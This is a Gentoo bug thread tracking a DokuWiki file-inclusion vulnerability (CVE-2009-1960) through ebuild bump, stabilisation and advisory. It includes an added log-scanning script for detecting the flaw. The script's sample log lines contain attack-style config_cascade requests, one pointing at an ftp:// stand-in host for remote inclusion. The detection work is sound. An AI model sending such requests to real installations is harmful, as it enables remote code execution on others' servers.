DokuWiki has released a patched version of their latest release to fix a "local file inclusion" bug.

-------------------------------------------------------------------------------
A security hole was discovered which allows an attacker to include arbitrary files located on the attacked DokuWiki installation. The included file is executed in the PHP context. This can be escalated by introducing malicious code through uploading file via the media manager or placing PHP code in editable pages.
-------------------------------------------------------------------------------
[ from http://bugs.splitbrain.org/index.php?do=details&task_id=1700 ]

This replaces dokuwiki-2009-02-14, so this bug can replace the 4-month old Gentoo bug #259624. This is probably a simple version bump of the latest ebuild, so it shouldn't be hard to fix.
Setting whiteboard. Maintainer, please bump as necessary.
Shouldn't this be assigned to security? Doing so... Shouldn't this be C1, as this is a remote code execution issue? Changing from C3, also raising Severity from minor to major as such. Also changing summary to match the other sec bugs' style.
======================================================
Name: CVE-2009-1960
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1960

inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.
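An added example (not part of the bug report or of DokuWiki's code): a log check for the request pattern the CVE entry above describes, run over constructed access-log lines. The combined log format, the function names and the sample values are assumptions; only query-string parameters are visible in an access log, so POST bodies and cookies are not covered.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address and request target of a combined-format access log line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
URL_SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

def cascade_params(target):
    """Return (key, value) pairs that set config_cascade on a doku.php request."""
    parts = urlsplit(target)
    if "doku.php" not in parts.path.split("/"):
        return []
    # parse_qsl percent-decodes, so %5B/%5D-encoded brackets are covered too
    return [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k.split("[", 1)[0] == "config_cascade"]

def scan(lines):
    """Return one finding per flagged parameter: client, key, value, remote flag."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for key, value in cascade_params(target):
            findings.append({"client": client, "key": key, "value": value,
                             # the CVE note mentions ftp:// URLs; flag any scheme
                             "remote": bool(URL_SCHEME_RE.match(value))})
    return findings

# Constructed sample lines (documentation addresses, placeholder values)
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jun/2009:10:00:01 +0000] "GET /doku.php?id=start HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Jun/2009:10:00:05 +0000] "GET /wiki/doku.php?config_cascade[main][default][]=PLACEHOLDER_LOCAL_FILE HTTP/1.1" 200 812',
    '198.51.100.7 - - [29/Jun/2009:10:00:09 +0000] "GET /doku.php?config_cascade%5Bmain%5D%5Bdefault%5D%5B%5D=ftp://host.invalid/PLACEHOLDER HTTP/1.1" 200 640',
    '192.0.2.44 - - [29/Jun/2009:10:01:00 +0000] "GET /doku.php?id=config_cascade HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A legitimate DokuWiki request has no reason to carry this parameter, so any hit is worth reviewing regardless of the response code.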
Ping. Any movement on this? It's been almost three weeks since this has been submitted.
Created attachment 195663
Proposed ebuild

I've attached a proposed ebuild for dokuwiki-20090214b. It ignores the issues brought up in #259624 about "EAPI=2 rework" (security presses more than upgrades), but needed to go a little further than just a rename of the ebuild: The source tarball is named with the trailing 'b', but it extracts into a directory without it. In src_unpack(), there was an existing rename of the folder, I just had it not use a variation of MY_PV instead of the previous use of MY_PV.

I don't mess with ebuilds much, so someone should double check my changes. I have this installed and it seems to work for me.
Oh, and before that ebuild gets checked in to the tree, the arch keywords should get fixed.
I'm waiting for a bump, too. Anything besides the keywords in the way?
Arches, please test and mark stable: =www-apps/dokuwiki-20090214b Target keywords : "amd64 ppc sparc x86" Already stabled : "amd64" Missing keywords: "ppc sparc x86" +*dokuwiki-20090214b (29 Jun 2009) + + 29 Jun 2009; Alex Legler <a3li@gentoo.org> -dokuwiki-20080505.ebuild, + +dokuwiki-20090214b.ebuild: + Non-maintainer commit: Version bump for security bug 272431. amd64 stable. + Thanks to Philippe Chaintreuil for proposing an updated ebuild. Removing + vulnerable version in ~arch. +
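Review bot: The ChangeLog line "Removing vulnerable version in ~arch" does not say which version or which issue it refers to. The only file the entry removes is dokuwiki-20080505.ebuild, while the CVE text quoted earlier in this bug names 2009-02-14 and two release candidates as affected. Suggest naming the removed ebuild explicitly and adding the CVE id (CVE-2009-1960) next to "security bug 272431", so the reason for the removal can be traced from the ChangeLog alone.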
x86 stable
sparc stable
ppc, ping
ppc stable.
Request filed.
GLSA 200908-09